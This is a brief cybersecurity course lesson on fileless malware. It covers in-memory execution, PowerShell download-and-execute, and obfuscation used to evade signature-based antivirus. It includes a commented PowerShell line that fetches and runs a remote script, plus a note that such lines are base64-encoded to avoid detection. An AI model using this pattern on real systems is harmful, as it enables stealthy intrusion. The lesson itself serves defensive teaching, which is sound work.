Cyber Security Academy · Lesson

Fileless Malware and Living-in-Memory Techniques

Analyze PowerShell-based malware, process injection, and in-memory execution that leaves no disk artifacts.

What is Fileless Malware?

Fileless malware executes entirely in memory without writing executable files to disk. It leverages legitimate OS tools, interpreter environments (PowerShell, WScript), and in-memory injection to operate while leaving minimal forensic artifacts detectable by traditional AV and file-based scanning.

PowerShell-Based Attacks

PowerShell enables download-and-execute patterns: IEX (Invoke-Expression) downloads and runs scripts directly from the internet without touching disk. Obfuscation techniques (character replacement, base64, string concatenation) bypass signature-based detection of malicious script content.

# Example obfuscation pattern (for awareness)
# IEX (New-Object Net.WebClient).DownloadString(url)
# Often base64-encoded to evade detection

All lessons in this course

APT Lifecycle: Initial Access to Exfiltration
Fileless Malware and Living-in-Memory Techniques
C2 Over HTTPS and DNS Tunneling
Threat Attribution and Campaign Tracking

← Back to Cyber Security Academy